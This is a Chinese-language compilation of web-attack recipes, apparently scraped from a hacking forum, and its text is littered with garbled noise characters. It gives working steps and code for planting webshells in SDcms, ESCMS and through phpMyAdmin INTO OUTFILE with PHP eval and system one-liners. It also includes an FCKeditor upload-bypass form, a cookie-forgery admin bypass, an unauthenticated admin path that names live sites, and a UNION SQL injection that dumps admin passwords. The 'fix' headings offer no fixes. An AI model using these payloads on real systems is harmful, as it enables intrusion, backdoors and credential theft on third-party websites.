如果connector.aspx文件被删可用以下exp,copy以下代码另存为html,上传任意文件
7 H/ }# e$ k$ w<form id="frmUpload" enctype="multipart/form-data" action="http://www.xxoo.net/controls/fckeditor/editor/filemanager/upload/aspx/upload.aspx?Type=Media" method="post">* t7 ]; k6 r6 ~) u: `
Upload a new file:<br>
4 V8 T+ w) g: H3 r/ t+ N6 U<input type="file" name="NewFile" size="50"><br>- o" D% w% c3 i& l
<input id="btnUpload" type="submit" value="Upload">2 D; m% R( x1 i
</form>
# ?' b% h7 h$ \ Y! B1 [-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------* T4 ^7 v: N9 m% M+ K+ @
/ u; w1 f+ }8 d' [: H1 ?! ]SDcms 后台拿webshell
4 @! S9 }, R! `. M5 R+ d L, E" @+ X* W( S. n, V9 K7 X
第一种方法:$ I( j/ n; r' i( a* {! i `# A
进入后台-->系统管理-->系统设置-->系统设置->网站名称;( R" j. C- n1 D, Z( P
把网站名称内容修改为 "%><%eval request("xxx")' //密码为xxx
% P& P8 V' M! S) f) r2 g# z( T用菜刀链接http://www.xxx.com/inc/const.asp 就搞定了。. l5 G" R0 S9 Y0 c
第二种方法:
6 \( a$ i; g% y4 Q! B* ~0 e8 G进入后台-->系统管理-->系统设置-->系统设置->上传设置;6 J1 q3 g* I" f( t/ ~, u
在文件类型里面添加一个aaspsp的文件类型,然后找一个上传的地方直接上传asp文件! 注:修改文件类型后不能重复点保存!# X8 t6 F! L- _ E
第三种方法:( l$ `# u- N8 Z" P
进入后台-->界面管理-->模板文件管理-->创建文件- y' U& O+ s+ L( w0 M
文件名写入getshell.ashx3 a4 F5 J% \) e9 m7 A" r8 N
内容写入下面内容:
; E3 p) l' p c# i; K( B/ l. p/====================复制下面的=========================/: ^6 _: g' r' F8 e: f$ {
<%@ WebHandler Language="C#" Class="Handler" %>
! M4 p2 O1 j; [% s4 z4 A1 busing System;
7 e0 |, l2 V% B: S8 Xusing System.Web;/ f! J% K# }2 T. n% _
using System.IO;% o o6 ]" u2 G2 z, M+ j
public class Handler : IHttpHandler {4 E7 N2 D9 H1 V: W* O% Q8 `
public void ProcessRequest (HttpContext context) {
1 z, o; O$ q) e% Y4 kcontext.Response.ContentType = "text/plain";$ l; y* W5 d9 ^3 d% I
StreamWriter file1= File.CreateText(context.Server.MapPath("getshell.asp"));- ]# {' w7 A+ C; o
file1.Write("<%response.clear:execute request(\"xxx\"):response.End%>");
; c5 M2 ]# c4 l! A% }% G# `: Mfile1.Flush();6 V! X: l, h9 N! [% g) }
file1.Close();$ m' x* x: [3 B- `' J; \( x4 z
}4 [( K+ v+ Y6 ~: u$ C% h4 W3 C0 B
public bool IsReusable {
7 s( S1 } z7 O0 a% m3 g) C9 D# Cget {
9 }, N3 {* T* Z) D1 xreturn false;
. a: |2 _: k$ r" F* v5 C}
0 Z$ p( |* c8 w! k) o}
; J/ k$ ]1 g& T% `% o}
9 [5 Z$ C9 {2 {4 ]/=============================================/
$ ` t1 l/ k# ?访问这个地址:http://www.xxx.com/skins/2009/getshell.ashx
. L+ ^- l% @7 i会在http://www.xxx.com/skins/2009/目录下生成getshell.asp 一句话木马 密码为xxx 用菜刀链接; o4 t. y, n+ L# D
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------% @6 r% H' ~+ d) p
2 @- U1 o% w8 L" x
ESCMS网站管理系统0day
5 O5 D1 Q1 {$ m4 y: |; l0 D, X6 s6 B/ t& @
后台登陆验证是通过admin/check.asp实现的: T1 m4 |( [4 k, [
3 B- _+ P' s G; C
首先我们打开http://target.com/admin/es_index.html
& I1 v/ f# Q, p5 q3 R然后在COOKIE结尾加上, \+ D7 ~/ c, i+ R5 X2 z7 K! \7 E
; ESCMS$_SP2=ES_admin=st0p;
2 [1 s, _0 K. [' @; s修改,然后刷新
2 w: I* r# L/ k. ^8 B5 B6 S进后台了嘎..; U0 d7 ^/ ]- F! K
然后呢…提权,嘿嘿,admin/up2.asp,上传目录参数filepath过滤不严,导致可截断目录,生成SHELL
, y9 L2 |2 i1 y; B! k. q4 X1 b
5 s8 u+ w5 K+ ]6 ^' g4 t利用方法,可以抓包,然后改一下,NC上传,还可以直接用DOMAIN等工具提交.
" z- V7 A* i7 d0 K# O嘿嘿,成功了,shell地址为http://target.com/admin/diy.asp
. w3 F- D/ D# s$ w8 u存在这个上传问题的还有admin/downup.asp,不过好像作者的疏忽,没有引用inc/ESCMS_Config.asp,导致打开此页面失败..
7 [4 f) F+ u/ D* K# L7 m在版本ESCMS V1.0 正式版中,同样存在上传问题admin/up2.asp和admin/downup.asp都可利用,只不过cookies欺骗不能用了
$ P4 X, O/ b1 a------------------------------------------------------------------------------------------------------------------------------------------------------------------------------( i0 l- r4 u" [6 r/ A# Y2 N
) }- F2 V$ }& b# }6 Z. C宁志网站管理系统后台无验证漏洞及修复
* \1 y" F$ z) G3 g6 R8 {: [! W S" k2 p: I- \
网上搜了一下,好像没有发布.如有雷同纯粹巧合!
/ T3 O2 V; M9 Y官方网站:www.ningzhi.net2 z3 W7 c. t; Z: e$ j, n- _2 {
学校网站管理系统 V.2011版本 6 @# {% Z; x2 @ S
http://down.chinaz.com/soft/29943.htm
6 D3 y6 U% H$ L9 x其它版本(如:政府版等),自行下载.. m* y0 x6 V5 G# [
漏洞说明:后台所有文件竟然都没有作访问验证...相当无语...竟然用的人还很多.汗~~~+ G8 \& b0 ?. J9 ^
login.asp代码如下:' l7 l2 G( o* j
<% response.Write"<script language=javascript>alert('登陆成功!请谨慎操作!谢谢!');this.location.href='manage.asp';</script>" %> }9 G# n9 P: {
manage.asp代码我就不帖出来了.反正也没验证.
/ @) i8 t% {3 R1 j( j$ D只要访问登陆页就可以成功登陆.....蛋疼~~~ 对此本人表示不理解!
. A2 f( } o# D" \) E9 Y漏洞利用:
7 T6 z, r8 Z1 k; J% B) y. O8 o直接访问http://www.0855.tv/admin/manage.asp. g2 ^7 ~* a0 |9 j. w
数据库操作:http://www.0855.tv/admin/manage_web.asp?txt=5&id=web5; y8 v/ y7 d4 G2 |" Z C% m3 U, X
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
) O' j* c2 s! Y0 \: S0 i. w
& h, i9 ^# m1 y% }# n: Lphpmyadmin拿shell的四种方法总结及修复
. U2 v3 }! F: d3 T
3 Z" j6 i7 k0 R- R方法一:
' S/ e# k6 @5 }8 h, Z# n0 [1 TCREATE TABLE `mysql`.`study` (`7on` TEXT NOT NULL );
8 e# ?2 G0 U2 ~! }6 L. q; FINSERT INTO `mysql`.`study` (`7on` )VALUES ('<?php @eval($_POST[7on])?>');1 K3 D: Z' _ i& Y% x% G, X0 P
SELECT 7onFROM study INTO OUTFILE 'E:/wamp/www/7.php';' B$ k5 o& e3 X9 G; c- h/ z
----以上同时执行,在数据库: mysql 下创建一个表名为:study,字段为7on,导出到E:/wamp/www/7.php
( a3 o8 l0 n8 o5 W" d 一句话连接密码:7on
7 g; V- \( Y4 R- A2 m方法二:
/ B5 \5 {8 U% ~- P* A读取文件内容: select load_file('E:/xamp/www/s.php');
" z9 ?! e/ [1 q( |3 B+ X3 Y写一句话: select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/study.php'
5 p. R1 y% f+ f/ l1 icmd执行权限: select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'# b& ?/ b7 k7 K7 R1 ?, e4 |) Q/ H6 }) H
方法三:
( T' U0 b+ [/ K. B- r/ I, O5 Y3 s' ~JhackJ版本 PHPmyadmin拿shell
U: o$ y2 @. N, [3 y) g* d; \Create TABLE study (cmd text NOT NULL);- [/ K- B! D p; X
Insert INTO study (cmd) VALUES('<?php eval($_POST[cmd])?>');, v$ N& m8 ~+ \+ |: @
select cmd from study into outfile 'E:/wamp/www/7.php';9 o& D6 M6 `' Z- b- E6 V
Drop TABLE IF EXISTS study; ?3 J, C+ M8 Q1 X. y
<?php eval($_POST[cmd])?>
( I( Y+ }( a* P9 o% d8 s! _ `3 ^: JCREATE TABLE study(cmd text NOT NULL );# MySQL 返回的查询结果为空(即零行)。
2 V6 k8 Z' N7 S0 j9 h% uINSERT INTO study( cmd ) VALUES ('<?php eval($_POST[cmd])?>');# 影响列数: 1
r' Q4 }' ^/ n" c# SSELECT cmdFROM study INTO OUTFILE 'E:/wamp/www/7.php';# 影响列数: 1
: X A8 h' J9 uDROP TABLE IF EXISTS study;# MySQL 返回的查询结果为空(即零行)。" i, K. ~, V( k$ C
方法四:
) E' m( Q$ u$ S S; gselect load_file('E:/xamp/www/study.php');
2 j. s: g3 d, Bselect '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'; G6 [% ]. P3 r
然后访问网站目录:http://www.2cto.com/study.php?cmd=dir
4 s: X; X8 `$ ]" p0 \! z2 x-----------------------------------------------------------------------------------------------------------------------------------------------------------------------
1 ?$ u1 V; Y U# R& |# G8 d6 \; H+ `& ?. s( c+ A+ U' s
NO.001中学网站管理系统 Build 110628 注入漏洞
* K6 ~- R2 W7 o5 e( G7 G! }' t" @
: k# i P Z4 v. V$ Y( R; CNO.001中学网站管理系统功能模块:& q4 d/ D( c( A& X, i
1.管理员资料:网站的基本信息设置(校长邮箱等),数据库备份,用户管理、部门及权限管理等
. ?& |- U0 S7 @0 U6 c: Q2.学校简介:一级分类,可以添加校园简介,领导致辞、校园风光、联系我们。。。等信息
: T& Y7 j5 y& T3 W3.文章管理:二级分类,动态添加各相关频道(图片视频频道、学校概况频道除外)文章等信息
( Y, y% J7 ^2 W" |7 A" L4.视频图片管理:一级分类,动态添加视频或者图片等信息5 v' O5 u* u; l+ I. e4 D9 V
5.留言管理:对留言,修改,删除、回复等管理
3 A* Y0 x9 o6 N6.校友频道:包括校友资料excel导出、管理等功能
+ [, z. \ }: B$ f3 o7.友情链接管理:二级分类,能建立不同种类的友情链接显示在首页
7 i, K* r* C" N* h默认后台:admin/login.asp
/ G: O- }) r' S* w6 K) H* ]% A官方演示:http://demo.001cms.net
L: g( V0 q$ _" f/ G1 |0 e2 v5 X1 h源码下载地址:http://down.chinaz.com/soft/30187.htm6 V; c' D7 x/ ?
EXP:
/ [9 N- `9 |- T" Z6 hunion select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin4 R1 v: Q: h! m2 G2 ~9 R" s. U9 C
测试:http://demo.001cms.net/shownews.asp?type=新闻动态&stype=校务公开&id=484 union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin/ E' r* y! W9 E+ d/ s
getshell:后台有备份,你懂的0 R( C+ }: n: r0 t, ?0 }% V
另:FCK编辑器有几处可利用.大家自己行挖掘,由于相关内容较多,我在这里就不说了。4 e; Z% a0 O9 J. ^) c, A
------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |